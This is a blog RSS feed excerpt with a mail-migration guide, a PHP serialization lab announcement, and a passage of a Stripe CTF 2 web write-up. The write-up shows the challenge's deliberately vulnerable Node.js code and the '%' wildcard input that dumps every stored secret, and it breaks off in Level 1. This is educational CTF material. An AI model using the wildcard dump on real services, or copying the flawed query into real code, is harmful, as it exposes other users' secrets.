		<category><![CDATA[transfer mail]]></category>
		<category><![CDATA[wget]]></category>

		<guid isPermaLink="false">http://abiusx.com/?p=795</guid>
		<description><![CDATA[I was in the process of migrating a host from Helm 4 to DirectAdmin, and it seems that Helm is pretty crappy and does not store mail in user&#8217;s storage, but instead in its own mail manager, but what else would someone expect of something Windows based. The problem and solution I describe here is [...]]]></description>
				<content:encoded><![CDATA[I was in the process of migrating a host from Helm 4 to DirectAdmin, and it turns out that Helm is pretty crappy and does not store mail in the user&#8217;s storage, but in its own mail manager instead; but what else would someone expect of something Windows based.

The problem and solution I describe here is applicable to all hosting managers, not just DA and Helm, but I use those in my examples.

The first step is to transfer the files, which is pretty easy. You can zip the whole folder in any control panel (sometimes it&#8217;s referred to as Backup), then fetch it via wget&#8217;s FTP functionality:
<blockquote>wget -r ftp://user:pass@host.com/folder/file.zip</blockquote>
I&#8217;m assuming you have SSH access on your destination; otherwise you have to do everything on your own computer and then move it to the destination, which is not very engineery! Then you unzip and relocate the files. Note that credentials written into the URL end up in your shell history and in the process list; wget can read them from a ~/.netrc file instead.

Then you have to move the databases, which is pretty easy with the mysqldump tool and the trivial mysql &lt; dumpfile.sql. The dump file is transferred with wget or FTP as well. Make sure to export and import from the terminal and not through something like phpMyAdmin, as encoding problems could make your life miserable.

The third, and for every major website the most tedious and important, step is moving the mail. Unfortunately many hosting providers do not let you grab all your mail in a single shot, and many others do not let you import it that easily. Mail is a little complicated these days, with MTAs, MDAs and the Maildir and Mbox formats.

The solution many hosting providers propose is to use Outlook over IMAP: download all mail from the source, reconnect to the destination and upload it all there. This goes through your personal machine and is very slow for a large number of mails and mailboxes.

The better way is to first create the same mailboxes on your destination, then use a mixture of mutt, getmail and scripting to transfer the mail. Mutt is a terminal-based IMAP/POP client which allows you to read and compose mail. getmail is a brilliant piece of software that simply fetches mail from a server to the client and stores it in standard formats.

Assume that your user is named myuser and is located at /home/myuser. There is usually a folder named Maildir there (or imap in the case of DirectAdmin, which contains one folder per mail user, each with a Maildir inside). Maildir is the storage format the IMAP server expects; it is also used by Dovecot.

Now install getmail on your destination and create a file ~/.getmail/getmailrc with the following content:
<blockquote>[options]
verbose = 1
delete = False

[retriever]
type = SimpleIMAPRetriever
server = sourceMailServer.com
username = srcUser
password = srcPass

[destination]
type = Maildir
path = ~/imap/domain.com/srcUser/Maildir/</blockquote>
You have to update this file for every mailbox you&#8217;re going to migrate, replacing username, password and path accordingly. Then go to the path you described and check that it exists (it should be your control panel&#8217;s default path, or you&#8217;re not migrating correctly). If it does not exist, create the folder Maildir with the 3 subfolders cur, new and tmp. You could also create the structure by using mutt instead of doing it manually, as follows:
<blockquote>mutt -f imap://user@srcHost.com</blockquote>
It then lists your messages and creates the folder structure for you.

Now run getmail and wait for the magic to happen. It is definitely going to take some time if you have a huge mail base. You could automate this process for multiple accounts with a simple script. This whole process is much faster and easier than any other solution.
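Here is an added example of such a script (my own, not part of the original post): it writes one getmailrc per mailbox in the layout shown above, creates the Maildir skeleton the destination expects, and runs getmail for each account. It assumes getmail is installed on the destination and that the DirectAdmin layout ~/imap/domain.com/user/Maildir/ applies; the server and domain names are placeholders.

```python
"""Added example, not from the original post: drive the getmail migration for
many mailboxes at once. It writes one getmailrc per mailbox in the layout
shown above, creates the Maildir skeleton (cur/new/tmp) the destination
expects, and runs getmail once per mailbox. Assumes getmail is installed on
the destination and the DirectAdmin layout ~/imap/<domain>/<user>/Maildir/."""
import os
import subprocess
from pathlib import Path

# Placeholders: replace with the real source IMAP server and destination domain.
SRC_SERVER = "sourceMailServer.com"
DOMAIN = "domain.com"


def ensure_maildir(maildir):
    """Create Maildir/{cur,new,tmp} owner-only if they do not exist yet."""
    maildir = Path(maildir)
    for sub in ("cur", "new", "tmp"):
        (maildir / sub).mkdir(parents=True, exist_ok=True, mode=0o700)
    maildir.chmod(0o700)
    return maildir


def render_getmailrc(user, password, maildir):
    """Return getmailrc text for one mailbox (same sections as the post's file)."""
    return (
        "[options]\n"
        "verbose = 1\n"
        "delete = False\n"           # leave the source mailbox untouched
        "\n"
        "[retriever]\n"
        "type = SimpleIMAPRetriever\n"
        f"server = {SRC_SERVER}\n"
        f"username = {user}\n"
        f"password = {password}\n"
        "\n"
        "[destination]\n"
        "type = Maildir\n"
        f"path = {maildir}/\n"       # getmail wants the trailing slash on a Maildir
    )


def write_getmailrc(user, password, maildir, rc_dir):
    """Write the rc file with mode 0600: it holds the source password in clear."""
    rc_dir = Path(rc_dir)
    rc_dir.mkdir(parents=True, exist_ok=True, mode=0o700)
    rc = rc_dir / f"getmailrc-{user}"
    fd = os.open(rc, os.O_WRONLY | os.O_CREAT | os.O_TRUNC, 0o600)
    with os.fdopen(fd, "w") as fh:
        fh.write(render_getmailrc(user, password, maildir))
    return rc


def migrate(accounts, mail_root, rc_dir, run=subprocess.run):
    """accounts: iterable of (user, password) pairs. Returns the rc files written.

    `run` is injectable so the plan can be exercised where getmail is absent."""
    mail_root = Path(mail_root)
    written = []
    for user, password in accounts:
        maildir = ensure_maildir(mail_root / DOMAIN / user / "Maildir")
        rc = write_getmailrc(user, password, maildir, rc_dir)
        # One getmail run per mailbox; over IMAP every folder is transferred.
        run(["getmail", "--rcfile", str(rc)], check=True)
        written.append(rc)
    return written


if __name__ == "__main__":
    # Constructed account list; in practice read user:password pairs from a file.
    home = Path.home()
    migrate([("srcUser", "srcPass")], home / "imap", home / ".getmail")
```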

Also keep in mind to use IMAP where available; with POP3 you would only transfer the Inbox. Don&#8217;t forget to ask your questions below.]]></content:encoded>
			<wfw:commentRss>http://abiusx.com/migrating-mail-from-one-host-to-the-other/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>PHP Serialization Pollution Attack</title>
		<link>http://abiusx.com/php-serialization-pollution-attack/</link>
		<comments>http://abiusx.com/php-serialization-pollution-attack/#comments</comments>
		<pubDate>Tue, 02 Oct 2012 18:56:17 +0000</pubDate>
		<dc:creator>AbiusX</dc:creator>
				<category><![CDATA[Computer]]></category>
		<category><![CDATA[English]]></category>
		<category><![CDATA[Security]]></category>
		<category><![CDATA[Challenge]]></category>
		<category><![CDATA[Lab]]></category>
		<category><![CDATA[PHP Serialize]]></category>
		<category><![CDATA[PHP Serialize Security]]></category>
		<category><![CDATA[PHP Unserialize]]></category>
		<category><![CDATA[Serialization security]]></category>
		<category><![CDATA[Serialize Flaw]]></category>
		<category><![CDATA[Serialize Security]]></category>

		<guid isPermaLink="false">http://abiusx.com/?p=790</guid>
		<description><![CDATA[PHP Serialization has a fatal flaw which allows for pollution of the scope and global context of an application, as well as running arbitrary code in some scenarios if sources of taint are allowed in. It is a very high impact attack but requires in-depth evaluation criteria and careful inspection to be caught. I have [...]]]></description>
				<content:encoded><![CDATA[PHP Serialization has a fatal flaw which allows for pollution of the scope and global context of an application, as well as running arbitrary code in some scenarios if sources of taint are allowed in. It is a very high impact attack but requires in-depth evaluation criteria and careful inspection to be caught.
I have prepared a lab to explore and try this attack, available at:
<p style="text-align: center;"><a title="PHP Serialization Pollution" href="/lab/hacking/serialize.php" target="_blank">PHP Serialization Pollution Lab</a></p>
Give it a try and let me know what you think. I suggest you do a lot of debugging on the code and master its exact running flow. Don&#8217;t forget that the source code of that page is available at:
<p style="text-align: center;"><a title="PHP Serialization Pollution Source Code" href="https://abiusx.com/lab/hacking/serialize.src.php" target="_blank">https://abiusx.com/lab/hacking/serialize.src.php</a></p>
I&#8217;m going to describe this in detail at a much later date.]]></content:encoded>
			<wfw:commentRss>http://abiusx.com/php-serialization-pollution-attack/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>Stripe CTF 2 &#8211; Web Challenges</title>
		<link>http://abiusx.com/stripe-ctf-2-web-challenges/</link>
		<comments>http://abiusx.com/stripe-ctf-2-web-challenges/#comments</comments>
		<pubDate>Sun, 26 Aug 2012 02:55:02 +0000</pubDate>
		<dc:creator>AbiusX</dc:creator>
				<category><![CDATA[Computer]]></category>
		<category><![CDATA[English]]></category>
		<category><![CDATA[Network]]></category>
		<category><![CDATA[Security]]></category>
		<category><![CDATA[Challenge]]></category>
		<category><![CDATA[Cryptography]]></category>
		<category><![CDATA[CSRF]]></category>
		<category><![CDATA[CTF]]></category>
		<category><![CDATA[education]]></category>
		<category><![CDATA[hacking]]></category>
		<category><![CDATA[hash Extension]]></category>
		<category><![CDATA[Hash Length Extension]]></category>
		<category><![CDATA[network]]></category>
		<category><![CDATA[PHP]]></category>
		<category><![CDATA[Port Scanning]]></category>
		<category><![CDATA[Python]]></category>
		<category><![CDATA[Ruby]]></category>
		<category><![CDATA[security]]></category>
		<category><![CDATA[SQL Injection]]></category>
		<category><![CDATA[Stripe]]></category>
		<category><![CDATA[Stripe CTF]]></category>
		<category><![CDATA[Stripe CTF 2.0]]></category>
		<category><![CDATA[Stripe CTF 2.0 challenges and solutions]]></category>
		<category><![CDATA[Stripe CTF Solutions]]></category>
		<category><![CDATA[Stripe CTF Web Solutions]]></category>
		<category><![CDATA[Stripe Solutions]]></category>
		<category><![CDATA[Stripe web CTF]]></category>
		<category><![CDATA[Stripe Web CTF Challenges]]></category>
		<category><![CDATA[UNION Bypassing]]></category>
		<category><![CDATA[XSS]]></category>

		<guid isPermaLink="false">http://abiusx.com/?p=757</guid>
		<description><![CDATA[I participated in the Stripe CTF Web Attacks and thus far it was the most well designed CTF I have ever encountered (and I have participated in a couple dozen). This is the second Stripe CTF, the first was exploitation based and this one was web based. Some Concepts CTF stands for Capture the Flag, its [...]]]></description>
				<content:encoded><![CDATA[I participated in the <a title="Stripe CTF" href="https://stripe-ctf.com/">Stripe CTF</a> Web Attacks, and thus far it is the best-designed CTF I have ever encountered (and I have participated in a couple dozen). This is the second Stripe CTF; the first was exploitation-based and this one was web-based.

<strong>Some Concepts</strong>

CTF stands for Capture the Flag; it&#8217;s a genre of games where you have to get past enemy lines, take their flag and bring it back to your base to score. Hacking games are usually CTF-like: you have to hack a system, find the flag (a random string) and bring it home to get the score for that level.

A CTF host needs plenty of servers, since many attackers simply try to break the servers instead of solving the challenges. Every participant&#8217;s environment also has to be isolated to give the best challenge experience, so a lot of careful programming on the host side is required.

There are almost always lots of bugs in CTFs because of their huge codebases, and hackers tend to break systems in ways the host didn&#8217;t plan for and still get the score; so the host has to watch the event, remove those bugs as soon as possible, and respond to the participants&#8217; questions and feedback.

<strong>How did I do</strong>

I participated in this CTF a couple of days ago, at midnight. Unfortunately my beloved uncle had just passed away and he had no sons, so I had to take care of much of the funeral stuff. I only had a couple of hours at midnight (at the cost of not sleeping before the funeral) to participate in this, so I did. I was able to solve 8 out of 9 challenges in almost 3 hours, and left for the funeral chores afterwards.

The 8th question was a little lengthy and I returned to it after almost 30 hours (after the funeral and a brief rest) and solved it in a few hours. Below I&#8217;m going to discuss the questions and their answers (how to hack them) as an educational document.
<h2>Challenges</h2>
I&#8217;m going to copy the challenges from Stripe-CTF, then provide the solutions in a section below each of them.

<h3>Challenge 0 &#8211; SQL String Comparison</h3>
You completed this level in 312.649 seconds. The password was <code>oxaMPRwadu</code>.

The solution you submitted was:

<code>% sql like operator</code>

<hr />

Welcome to Capture the Flag! If you find yourself stuck or want to learn more about web security in general, we&#8217;ve prepared a list of helpful <a href="https://stripe-ctf.com/about">resources</a> for you. You can chat with fellow solvers in the <a href="https://answers.stripe.com/chat#ctf">CTF chatroom</a> (also accessible in your favorite IRC client at <a href="irc://irc.stripe.com:+6697/ctf">irc://irc.stripe.com:+6697/ctf</a>).

We&#8217;ll start you out with Level 0, the Secret Safe. The Secret Safe is designed as a secure place to store all of your secrets. It turns out that the password to access Level 1 is stored within the Secret Safe. If only you knew how to <a href="http://en.wikipedia.org/wiki/Safe-cracking">crack safes</a>&#8230;

You can access the Secret Safe at <strong><a href="https://level00-2.stripe-ctf.com/user-cqxxidnqrs" target="_blank">https://level00-2.stripe-ctf.com/user-cqxxidnqrs</a></strong>. The Safe&#8217;s code is included below, and can also be obtained via <code>git clone https://level00-2.stripe-ctf.com/user-cqxxidnqrs/level00-code</code>.

<hr />

Here&#8217;s the code for <code>level00.js</code>, the main server file:
<table>
<tbody>
<tr>
<td title="double click to toggle">
<pre><a name="n1" href="https://stripe-ctf.com/levels/0#n1"></a>1
<a name="n2" href="https://stripe-ctf.com/levels/0#n2"></a>2
<a name="n3" href="https://stripe-ctf.com/levels/0#n3"></a>3
<a name="n4" href="https://stripe-ctf.com/levels/0#n4"></a>4
<a name="n5" href="https://stripe-ctf.com/levels/0#n5"></a>5
<a name="n6" href="https://stripe-ctf.com/levels/0#n6"></a>6
<a name="n7" href="https://stripe-ctf.com/levels/0#n7"></a>7
<a name="n8" href="https://stripe-ctf.com/levels/0#n8"></a>8
<a name="n9" href="https://stripe-ctf.com/levels/0#n9"></a>9
<strong><a name="n10" href="https://stripe-ctf.com/levels/0#n10"></a>10</strong>
<a name="n11" href="https://stripe-ctf.com/levels/0#n11"></a>11
<a name="n12" href="https://stripe-ctf.com/levels/0#n12"></a>12
<a name="n13" href="https://stripe-ctf.com/levels/0#n13"></a>13
<a name="n14" href="https://stripe-ctf.com/levels/0#n14"></a>14
<a name="n15" href="https://stripe-ctf.com/levels/0#n15"></a>15
<a name="n16" href="https://stripe-ctf.com/levels/0#n16"></a>16
<a name="n17" href="https://stripe-ctf.com/levels/0#n17"></a>17
<a name="n18" href="https://stripe-ctf.com/levels/0#n18"></a>18
<a name="n19" href="https://stripe-ctf.com/levels/0#n19"></a>19
<strong><a name="n20" href="https://stripe-ctf.com/levels/0#n20"></a>20</strong>
<a name="n21" href="https://stripe-ctf.com/levels/0#n21"></a>21
<a name="n22" href="https://stripe-ctf.com/levels/0#n22"></a>22
<a name="n23" href="https://stripe-ctf.com/levels/0#n23"></a>23
<a name="n24" href="https://stripe-ctf.com/levels/0#n24"></a>24
<a name="n25" href="https://stripe-ctf.com/levels/0#n25"></a>25
<a name="n26" href="https://stripe-ctf.com/levels/0#n26"></a>26
<a name="n27" href="https://stripe-ctf.com/levels/0#n27"></a>27
<a name="n28" href="https://stripe-ctf.com/levels/0#n28"></a>28
<a name="n29" href="https://stripe-ctf.com/levels/0#n29"></a>29
<strong><a name="n30" href="https://stripe-ctf.com/levels/0#n30"></a>30</strong>
<a name="n31" href="https://stripe-ctf.com/levels/0#n31"></a>31
<a name="n32" href="https://stripe-ctf.com/levels/0#n32"></a>32
<a name="n33" href="https://stripe-ctf.com/levels/0#n33"></a>33
<a name="n34" href="https://stripe-ctf.com/levels/0#n34"></a>34
<a name="n35" href="https://stripe-ctf.com/levels/0#n35"></a>35
<a name="n36" href="https://stripe-ctf.com/levels/0#n36"></a>36
<a name="n37" href="https://stripe-ctf.com/levels/0#n37"></a>37
<a name="n38" href="https://stripe-ctf.com/levels/0#n38"></a>38
<a name="n39" href="https://stripe-ctf.com/levels/0#n39"></a>39
<strong><a name="n40" href="https://stripe-ctf.com/levels/0#n40"></a>40</strong>
<a name="n41" href="https://stripe-ctf.com/levels/0#n41"></a>41
<a name="n42" href="https://stripe-ctf.com/levels/0#n42"></a>42
<a name="n43" href="https://stripe-ctf.com/levels/0#n43"></a>43
<a name="n44" href="https://stripe-ctf.com/levels/0#n44"></a>44
<a name="n45" href="https://stripe-ctf.com/levels/0#n45"></a>45
<a name="n46" href="https://stripe-ctf.com/levels/0#n46"></a>46
<a name="n47" href="https://stripe-ctf.com/levels/0#n47"></a>47
<a name="n48" href="https://stripe-ctf.com/levels/0#n48"></a>48
<a name="n49" href="https://stripe-ctf.com/levels/0#n49"></a>49
<strong><a name="n50" href="https://stripe-ctf.com/levels/0#n50"></a>50</strong>
<a name="n51" href="https://stripe-ctf.com/levels/0#n51"></a>51
<a name="n52" href="https://stripe-ctf.com/levels/0#n52"></a>52
<a name="n53" href="https://stripe-ctf.com/levels/0#n53"></a>53
<a name="n54" href="https://stripe-ctf.com/levels/0#n54"></a>54
<a name="n55" href="https://stripe-ctf.com/levels/0#n55"></a>55
<a name="n56" href="https://stripe-ctf.com/levels/0#n56"></a>56
<a name="n57" href="https://stripe-ctf.com/levels/0#n57"></a>57
<a name="n58" href="https://stripe-ctf.com/levels/0#n58"></a>58
<a name="n59" href="https://stripe-ctf.com/levels/0#n59"></a>59
<strong><a name="n60" href="https://stripe-ctf.com/levels/0#n60"></a>60</strong>
<a name="n61" href="https://stripe-ctf.com/levels/0#n61"></a>61
<a name="n62" href="https://stripe-ctf.com/levels/0#n62"></a>62
<a name="n63" href="https://stripe-ctf.com/levels/0#n63"></a>63
<a name="n64" href="https://stripe-ctf.com/levels/0#n64"></a>64
<a name="n65" href="https://stripe-ctf.com/levels/0#n65"></a>65
<a name="n66" href="https://stripe-ctf.com/levels/0#n66"></a>66</pre>
</td>
<td>
<pre>// Install dependencies with 'npm install'
// Run as 'node level00.js'

var express = require('express'), // Web framework
    mu = require('mu2'),          // Mustache.js templating
    sqlite3 = require('sqlite3'); // SQLite (database) driver

// Look for templates in the current directory
mu.root = __dirname;

// Set up the DB
var db = new sqlite3.Database('level00.db');
db.run(
  'CREATE TABLE IF NOT EXISTS secrets (' +
    'key varchar(255),' +
    'secret varchar(255)' +
  ')'
);

// Create the server
var app = express();
app.use(express.bodyParser());

function renderPage(res, variables) {
  var stream = mu.compileAndRender('level00.html', variables);
  res.header('Content-Type', 'text/html');
  stream.pipe(res);
}

app.get('/*', function(req, res) {
  var namespace = req.param('namespace');

  if (namespace) {
    var query = 'SELECT * FROM secrets WHERE key LIKE ? || ".%"';
    db.all(query, namespace, function(err, secrets) {
             if (err) throw err;

             renderPage(res, {namespace: namespace, secrets: secrets});
           });
  } else {
    renderPage(res, {});
  }
});

app.post('/*', function(req, res) {
  var namespace = req.body['namespace'];
  var secret_name = req.body['secret_name'];
  var secret_value = req.body['secret_value'];

  var query = 'INSERT INTO secrets (key, secret) VALUES (? || "." || ?, ?)';
  db.run(query, namespace, secret_name, secret_value, function(err) {
     if (err) throw err;

           res.header('Content-Type', 'text/html');
           res.redirect(req.path + '?namespace=' + namespace);
         });
});

if (process.argv.length &gt; 2) {
  var socket = process.argv[2];
  console.log("Starting server on UNIX socket " + socket);
  app.listen(socket);
} else {
  console.log("Starting server at http://localhost:3000/");
  app.listen(3000);
}</pre>
</td>
</tr>
</tbody>
</table>
And here&#8217;s the code for <code>level00.html</code>, its mustache.js template:
<table>
<tbody>
<tr>
<td title="double click to toggle">
<pre><a name="n1" href="https://stripe-ctf.com/levels/0#n1"></a>1
<a name="n2" href="https://stripe-ctf.com/levels/0#n2"></a>2
<a name="n3" href="https://stripe-ctf.com/levels/0#n3"></a>3
<a name="n4" href="https://stripe-ctf.com/levels/0#n4"></a>4
<a name="n5" href="https://stripe-ctf.com/levels/0#n5"></a>5
<a name="n6" href="https://stripe-ctf.com/levels/0#n6"></a>6
<a name="n7" href="https://stripe-ctf.com/levels/0#n7"></a>7
<a name="n8" href="https://stripe-ctf.com/levels/0#n8"></a>8
<a name="n9" href="https://stripe-ctf.com/levels/0#n9"></a>9
<strong><a name="n10" href="https://stripe-ctf.com/levels/0#n10"></a>10</strong>
<a name="n11" href="https://stripe-ctf.com/levels/0#n11"></a>11
<a name="n12" href="https://stripe-ctf.com/levels/0#n12"></a>12
<a name="n13" href="https://stripe-ctf.com/levels/0#n13"></a>13
<a name="n14" href="https://stripe-ctf.com/levels/0#n14"></a>14
<a name="n15" href="https://stripe-ctf.com/levels/0#n15"></a>15
<a name="n16" href="https://stripe-ctf.com/levels/0#n16"></a>16
<a name="n17" href="https://stripe-ctf.com/levels/0#n17"></a>17
<a name="n18" href="https://stripe-ctf.com/levels/0#n18"></a>18
<a name="n19" href="https://stripe-ctf.com/levels/0#n19"></a>19
<strong><a name="n20" href="https://stripe-ctf.com/levels/0#n20"></a>20</strong>
<a name="n21" href="https://stripe-ctf.com/levels/0#n21"></a>21
<a name="n22" href="https://stripe-ctf.com/levels/0#n22"></a>22
<a name="n23" href="https://stripe-ctf.com/levels/0#n23"></a>23
<a name="n24" href="https://stripe-ctf.com/levels/0#n24"></a>24
<a name="n25" href="https://stripe-ctf.com/levels/0#n25"></a>25
<a name="n26" href="https://stripe-ctf.com/levels/0#n26"></a>26
<a name="n27" href="https://stripe-ctf.com/levels/0#n27"></a>27
<a name="n28" href="https://stripe-ctf.com/levels/0#n28"></a>28
<a name="n29" href="https://stripe-ctf.com/levels/0#n29"></a>29
<strong><a name="n30" href="https://stripe-ctf.com/levels/0#n30"></a>30</strong>
<a name="n31" href="https://stripe-ctf.com/levels/0#n31"></a>31
<a name="n32" href="https://stripe-ctf.com/levels/0#n32"></a>32
<a name="n33" href="https://stripe-ctf.com/levels/0#n33"></a>33
<a name="n34" href="https://stripe-ctf.com/levels/0#n34"></a>34
<a name="n35" href="https://stripe-ctf.com/levels/0#n35"></a>35
<a name="n36" href="https://stripe-ctf.com/levels/0#n36"></a>36
<a name="n37" href="https://stripe-ctf.com/levels/0#n37"></a>37
<a name="n38" href="https://stripe-ctf.com/levels/0#n38"></a>38
<a name="n39" href="https://stripe-ctf.com/levels/0#n39"></a>39
<strong><a name="n40" href="https://stripe-ctf.com/levels/0#n40"></a>40</strong>
<a name="n41" href="https://stripe-ctf.com/levels/0#n41"></a>41
<a name="n42" href="https://stripe-ctf.com/levels/0#n42"></a>42
<a name="n43" href="https://stripe-ctf.com/levels/0#n43"></a>43
<a name="n44" href="https://stripe-ctf.com/levels/0#n44"></a>44
<a name="n45" href="https://stripe-ctf.com/levels/0#n45"></a>45
<a name="n46" href="https://stripe-ctf.com/levels/0#n46"></a>46
<a name="n47" href="https://stripe-ctf.com/levels/0#n47"></a>47
<a name="n48" href="https://stripe-ctf.com/levels/0#n48"></a>48
<a name="n49" href="https://stripe-ctf.com/levels/0#n49"></a>49
<strong><a name="n50" href="https://stripe-ctf.com/levels/0#n50"></a>50</strong>
<a name="n51" href="https://stripe-ctf.com/levels/0#n51"></a>51
<a name="n52" href="https://stripe-ctf.com/levels/0#n52"></a>52
<a name="n53" href="https://stripe-ctf.com/levels/0#n53"></a>53
<a name="n54" href="https://stripe-ctf.com/levels/0#n54"></a>54
<a name="n55" href="https://stripe-ctf.com/levels/0#n55"></a>55
<a name="n56" href="https://stripe-ctf.com/levels/0#n56"></a>56
<a name="n57" href="https://stripe-ctf.com/levels/0#n57"></a>57
<a name="n58" href="https://stripe-ctf.com/levels/0#n58"></a>58
<a name="n59" href="https://stripe-ctf.com/levels/0#n59"></a>59
<strong><a name="n60" href="https://stripe-ctf.com/levels/0#n60"></a>60</strong>
<a name="n61" href="https://stripe-ctf.com/levels/0#n61"></a>61
<a name="n62" href="https://stripe-ctf.com/levels/0#n62"></a>62
<a name="n63" href="https://stripe-ctf.com/levels/0#n63"></a>63</pre>
</td>
<td>
<pre>&lt;html&gt;
  &lt;head&gt;
    &lt;title&gt;Secret Safe&lt;/title&gt;
  &lt;/head&gt;
  &lt;body&gt;
    {{#namespace}}
    &lt;div style="border-width: 2px; border-style: outset; padding: 5px"&gt;
      Showing secrets for &lt;strong&gt;{{namespace}}&lt;/strong&gt;:
      &lt;table&gt;
        &lt;thead&gt;
          &lt;tr&gt;
            &lt;th&gt;Key&lt;/th&gt;
            &lt;th&gt;Value&lt;/th&gt;
          &lt;/tr&gt;
        &lt;/thead&gt;
        &lt;tbody&gt;
          {{#secrets}}
          &lt;tr&gt;
            &lt;td&gt;{{ key }}&lt;/td&gt;
            &lt;td&gt;{{ secret }}&lt;/td&gt;
          &lt;/tr&gt;
          {{/secrets}}
          {{^secrets}}
          &lt;tr&gt;
            &lt;td span="2"&gt;
              You have no secrets stored with us. Try using the form below.
            &lt;/td&gt;
          &lt;/tr&gt;
          {{/secrets}}
        &lt;/tbody&gt;
      &lt;/table&gt;

      &lt;hr /&gt;
    &lt;/div&gt;
    {{/namespace}}

    &lt;form action="" method="POST"&gt;
      &lt;p&gt;
        &lt;label for="namespace"&gt;Namespace:&lt;/label&gt;
        &lt;input type="text" name="namespace" id="namespace"
            value="{{ namespace }}" /&gt;
      &lt;/p&gt;
      &lt;p&gt;
        &lt;label for="secret_name"&gt;Name of your secret:&lt;/label&gt;
        &lt;input type="text" name="secret_name" id="secret_name"&gt;
      &lt;/p&gt;
      &lt;p&gt;
        &lt;label for="secret_value"&gt;Your secret:&lt;/label&gt;
        &lt;input type="password" name="secret_value" id="secret_value"&gt;
      &lt;/p&gt;
      &lt;p&gt;
        &lt;input type="submit" value="Store my secret!" /&gt;
      &lt;/p&gt;
    &lt;/form&gt;
    &lt;form action="" method="GET"&gt;
      &lt;label for="change_namespace"&gt;
        Want to retrieve your secrets? View secrets for:
      &lt;/label&gt;
      &lt;input name="namespace" id="change_namespace" /&gt;
      &lt;input type="submit" value="View" /&gt;
    &lt;/form&gt;
  &lt;/body&gt;
&lt;/html&gt;</pre>
</td>
</tr>
</tbody>
</table>

<hr />

<strong>The Solution</strong>

The web server is written in <em>node.js</em>, the server-side JavaScript library. If you send POST data (line 45), it parses it and inserts it into the database.

If you make a GET request (line 30), it dumps the key/secret pairs stored under the namespace you supply. Since the query uses <strong>LIKE</strong> (line 34) with the namespace bound as a prefix, you can pass the wildcard character (%), which matches every key in the table, so all stored secrets are dumped to the screen and the one you want is among them.

Keep in mind that it uses prepared statements, so no SQL injection is possible: parameter binding protects the structure of the query, but it does not strip the meaning of the LIKE metacharacters (% and _) from a bound value.
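To make that point concrete, here is an added example (mine, not part of level00.js or of the CTF) that runs the level 0 query against a constructed in-memory SQLite table, first as written and then with the LIKE metacharacters escaped in the bound value; the rows and secrets are made up.

```python
"""Added example, not part of level00.js or of the write-up: reproduces the
level 0 lookup against an in-memory SQLite table and shows that binding the
namespace as a parameter does not neutralise LIKE wildcards, then two ways to
fix it. The table rows are constructed sample data."""
import sqlite3

SAMPLE_ROWS = [
    ("alice.password", "hunter2"),
    ("bob.ssh", "id_rsa"),
    ("level01.key", "FLAG"),
]


def make_db():
    """In-memory copy of the `secrets` table from level00.js with sample rows."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE secrets (key varchar(255), secret varchar(255))")
    db.executemany("INSERT INTO secrets (key, secret) VALUES (?, ?)", SAMPLE_ROWS)
    return db


def lookup_original(db, namespace):
    """The query from level00.js line 34: parameterised, yet '%' matches every key."""
    sql = "SELECT key, secret FROM secrets WHERE key LIKE ? || '.%'"
    return db.execute(sql, (namespace,)).fetchall()


def escape_like(value, esc="\\"):
    """Escape the LIKE metacharacters so a bound value is matched literally."""
    return (value.replace(esc, esc + esc)
                 .replace("%", esc + "%")
                 .replace("_", esc + "_"))


def lookup_hardened(db, namespace):
    """Same lookup with the namespace escaped and an ESCAPE clause on the LIKE."""
    sql = "SELECT key, secret FROM secrets WHERE key LIKE ? || '.%' ESCAPE '\\'"
    return db.execute(sql, (escape_like(namespace),)).fetchall()


def lookup_exact(db, namespace):
    """Stricter alternative: no pattern at all, compare the namespace prefix exactly."""
    sql = ("SELECT key, secret FROM secrets "
           "WHERE substr(key, 1, length(?) + 1) = ? || '.'")
    return db.execute(sql, (namespace, namespace)).fetchall()


if __name__ == "__main__":
    db = make_db()
    print("original, namespace '%':", lookup_original(db, "%"))   # every row leaks
    print("hardened, namespace '%':", lookup_hardened(db, "%"))   # nothing
    print("hardened, namespace 'alice':", lookup_hardened(db, "alice"))
```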

<h3><strong>Challenge 1 &#8211; PHP Input Validation</strong></h3>
You completed this level in 449.956 seconds. The password was <code>FrXHxPWtlg</code>.

The solution you submitted was:

<code>provide filename and attempt both empty on get params</code>

<hr />

Excellent, you are now on Level 1, the Guessing Game. All you have to do is guess the combination correctly, and you&#8217;ll be given the password to access Level 2! We&#8217;ve been assured that this level has no security vulnerabilities in it (and the machine running the Guessing Game has no outbound network connectivity, meaning you wouldn&#8217;t be able to extract the password anyway), so you&#8217;ll probably just have to try all the possible combinations. Or will you&#8230;?

You can play the Guessing Game at <strong><a href="https://level01-2.stripe-ctf.com/user-pwadawuqtd" target="_blank">https://level01-2.stripe-ctf.com/user-pwadawuqtd</a></strong>. The code for the Game can be obtained from <code>git clone https://level01-2.stripe-ctf.com/user-pwadawuqtd/level01-code</code>, and is also included below.

The contents of <code>index.php</code>:
<table>
<tbody>
<tr>
<td title="double click to toggle">
<pre><a name="n1" href="https://stripe-ctf.com/levels/1#n1"></a>1
<a name="n2" href="https://stripe-ctf.com/levels/1#n2"></a>2
<a name="n3" href="https://stripe-ctf.com/levels/1#n3"></a>3
<a name="n4" href="https://stripe-ctf.com/levels/1#n4"></a>4
<a name="n5" href="https://stripe-ctf.com/levels/1#n5"></a>5
<a name="n6" href="https://stripe-ctf.com/levels/1#n6"></a>6
<a name="n7" href="https://stripe-ctf.com/levels/1#n7"></a>7
<a name="n8" href="https://stripe-ctf.com/levels/1#n8"></a>8
<a name="n9" href="https://stripe-ctf.com/levels/1#n9"></a>9
<strong><a name="n10" href="https://stripe-ctf.com/levels/1#n10"></a>10</strong>
<a name="n11" href="https://stripe-ctf.com/levels/1#n11"></a>11
<a name="n12" href="https://stripe-ctf.com/levels/1#n12"></a>12
<a name="n13" href="https://stripe-ctf.com/levels/1#n13"></a>13
<a name="n14" href="https://stripe-ctf.com/levels/1#n14"></a>14
<a name="n15" href="https://stripe-ctf.com/levels/1#n15"></a>15
<a name="n16" href="https://stripe-ctf.com/levels/1#n16"></a>16
<a name="n17" href="https://stripe-ctf.com/levels/1#n17"></a>17
<a name="n18" href="https://stripe-ctf.com/levels/1#n18"></a>18
<a name="n19" href="https://stripe-ctf.com/levels/1#n19"></a>19
<strong><a name="n20" href="https://stripe-ctf.com/levels/1#n20"></a>20</strong>
<a name="n21" href="https://stripe-ctf.com/levels/1#n21"></a>21
<a name="n22" href="https://stripe-ctf.com/levels/1#n22"></a>22
